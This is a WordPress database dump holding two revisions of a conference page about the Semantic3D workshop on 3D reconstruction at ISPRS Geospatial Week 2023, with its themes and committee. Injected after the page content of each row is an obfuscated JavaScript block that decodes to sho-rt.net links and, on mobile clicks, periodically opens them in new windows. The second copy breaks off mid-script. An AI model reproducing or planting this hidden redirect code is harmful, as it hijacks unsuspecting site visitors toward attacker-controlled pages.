(2845,1,'2022-10-14 17:39:49','2022-10-14 17:39:49','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2841\" img_size=\"800x800\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Automated 3D reconstruction and the extraction of semantic information from images and image sequences are important research topics in Photogrammetry, Remote Sensing, GIS, and Computer Vision. This workshop is a follow-up to the first event under the same name embedded in the ISPRS Geospatial Week 2019 in Enschede. It will bring together experts working in photogrammetric 3D reconstruction, semantic interpretation of imagery and image sequence analysis to discuss recent developments, the potential of various data sources, and future trends in 3D reconstruction and information extraction from imagery. Its focus is on methodological research. Semantic3D will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"50\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2843\" img_size=\"1600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Feature extraction, stereo/multi-view sparse matching, dense image matching</strong></h6>\n</li>\n<li>\n<h6><strong>3D data acquisition and surface reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Automatic detection and 3D reconstruction of objects using data from terrestrial, airborne or satellite sensors</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning and other supervised methods for 3D reconstruction and for the semantic interpretation of 3D scenes based on images, point clouds, or surface meshes</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-source, multi-view, multi-temporal, multi-modal image analysis: Integration of data from multiple viewpoints or multiple sensors for automated object detection and 3D reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of existing interpreted data such as historical maps or urban GIS for object detection and reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty estimation and uncertainty propagation in 3D reconstruction and classification</strong></h6>\n</li>\n<li>\n<h6><strong>Methods for the generation and update of high-resolution 3D city models and road databases</strong></h6>\n</li>\n<li>\n<h6><strong>Object detection, recognition, 3D reconstruction and tracking in the context of robotics or autonomous driving and mobile mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Dynamic scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection in image time series and 3D point clouds</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of images, motion and vehicle models</strong></h6>\n</li>\n<li>\n<h6><strong>Video analysis for security/surveillance tasks</strong></h6>\n</li>\n<li>\n<h6><strong>Explainable machine learning for geospatial applications</strong></h6>\n</li>\n<li>\n<h6><strong>Methods to overcome data biases, limited labels, and weak labels</strong></h6>\n</li>\n<li>\n<h6><strong>Evaluation of performance, speed, reliability, robustness, and generalization ability of methods</strong></h6>\n</li>\n</ul>\n<h6></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Ksenia Bittner, German Aerospace Center(DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Böhm, University College London, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Max Coenen, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Pablo d\'Angelo, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Friedrich Fraundorfer, Graz University of Technology, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, Technische Universität Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Norbert Haala, University of Stuttgart, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Dorota Iwanszczuk, TU Darmstadt, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Arpan Kusari, University of Michigan, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Florent Lafarge, INRIA, Sophia Antipolis, France</strong></h6>\n</li>\n<li>\n<h6><strong>Loic Landrieu, National Geographical Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Max Mehltretter, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Sander Oude Elberink, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Charlotte Pelletier, University of Southern Brittany, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ribana Roscher, University of Bonn, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Franz Rottensteiner, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Marc Russwurm, Federal Institute of Technology (EPFL), Lausanne, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Maria Vakalopoulou, University of Paris-Saclay, France</strong></h6>\n</li>\n<li>\n<h6><strong>Bruno Vallet, Institut Géographique National (IGN), France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Dirk Wegner, University of Zurich, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martin Weinmann, Karlsruhe Institute of Technology, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Wen Xiao, China University of Geosciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Michael Ying Yang, University of Twente, The Netherlands</strong></h6>\n</li>\n</ul>\n<h6><strong>Others tba.</strong></h6>\n<h6></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>WG II/2 Point cloud acquisition and processing </strong></h6>\n</li>\n<li>\n<h6><strong>WG II/3 3D scene reconstruction for modeling &amp; mapping</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/4 AI / ML for geospatial data</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/5 Temporal geospatial data understanding</strong></h6>\n</li>\n</ul>\n<h6><strong><u> </u></strong></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the journal PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"text-align:justify; color:blue;\" href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>; current impact factor: 3.292). The papers being accepted after the peer-review process of the journal will appear in a special issue of that journal dedicated to this workshop. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','inherit','closed','closed','','2795-revision-v1','','','2022-10-14 17:39:49','2022-10-14 17:39:49','',2795,'https://gsw2023.com/?p=2845',0,'revision','',0),
(2846,1,'2022-10-14 17:40:22','2022-10-14 17:40:22','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2841\" img_size=\"800x800\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Automated 3D reconstruction and the extraction of semantic information from images and image sequences are important research topics in Photogrammetry, Remote Sensing, GIS, and Computer Vision. This workshop is a follow-up to the first event under the same name embedded in the ISPRS Geospatial Week 2019 in Enschede. It will bring together experts working in photogrammetric 3D reconstruction, semantic interpretation of imagery and image sequence analysis to discuss recent developments, the potential of various data sources, and future trends in 3D reconstruction and information extraction from imagery. Its focus is on methodological research. Semantic3D will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"50\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2843\" img_size=\"1600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Feature extraction, stereo/multi-view sparse matching, dense image matching</strong></h6>\n</li>\n<li>\n<h6><strong>3D data acquisition and surface reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Automatic detection and 3D reconstruction of objects using data from terrestrial, airborne or satellite sensors</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning and other supervised methods for 3D reconstruction and for the semantic interpretation of 3D scenes based on images, point clouds, or surface meshes</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-source, multi-view, multi-temporal, multi-modal image analysis: Integration of data from multiple viewpoints or multiple sensors for automated object detection and 3D reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of existing interpreted data such as historical maps or urban GIS for object detection and reconstruction</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty estimation and uncertainty propagation in 3D reconstruction and classification</strong></h6>\n</li>\n<li>\n<h6><strong>Methods for the generation and update of high-resolution 3D city models and road databases</strong></h6>\n</li>\n<li>\n<h6><strong>Object detection, recognition, 3D reconstruction and tracking in the context of robotics or autonomous driving and mobile mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Dynamic scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Change detection in image time series and 3D point clouds</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of images, motion and vehicle models</strong></h6>\n</li>\n<li>\n<h6><strong>Video analysis for security/surveillance tasks</strong></h6>\n</li>\n<li>\n<h6><strong>Explainable machine learning for geospatial applications</strong></h6>\n</li>\n<li>\n<h6><strong>Methods to overcome data biases, limited labels, and weak labels</strong></h6>\n</li>\n<li>\n<h6><strong>Evaluation of performance, speed, reliability, robustness, and generalization ability of methods</strong></h6>\n</li>\n</ul>\n<h6></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Ksenia Bittner, German Aerospace Center(DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Böhm, University College London, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Max Coenen, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Pablo d\'Angelo, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Friedrich Fraundorfer, Graz University of Technology, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, Technische Universität Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Norbert Haala, University of Stuttgart, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Dorota Iwanszczuk, TU Darmstadt, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Arpan Kusari, University of Michigan, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Florent Lafarge, INRIA, Sophia Antipolis, France</strong></h6>\n</li>\n<li>\n<h6><strong>Loic Landrieu, National Geographical Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Max Mehltretter, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Sander Oude Elberink, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Charlotte Pelletier, University of Southern Brittany, France</strong></h6>\n</li>\n<li>\n<h6><strong>Ribana Roscher, University of Bonn, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Franz Rottensteiner, Leibniz Universität Hannover, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Marc Russwurm, Federal Institute of Technology (EPFL), Lausanne, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Maria Vakalopoulou, University of Paris-Saclay, France</strong></h6>\n</li>\n<li>\n<h6><strong>Bruno Vallet, Institut Géographique National (IGN), France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Dirk Wegner, University of Zurich, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martin Weinmann, Karlsruhe Institute of Technology, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Wen Xiao, China University of Geosciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Michael Ying Yang, University of Twente, The Netherlands</strong></h6>\n</li>\n</ul>\n<h6><strong>Others tba.</strong></h6>\n<h6></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>WG II/2 Point cloud acquisition and processing </strong></h6>\n</li>\n<li>\n<h6><strong>WG II/3 3D scene reconstruction for modeling &amp; mapping</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/4 AI / ML for geospatial data</strong></h6>\n</li>\n<li>\n<h6><strong>WG II/5 Temporal geospatial data understanding</strong></h6>\n</li>\n</ul>\n<h6><strong><u> </u></strong></h6>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the journal PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"text-align:justify; color:blue;\" href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>; current impact factor: 3.292). The papers being accepted after the peer-review process of the journal will appear in a special issue of that journal dedicated to this workshop. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 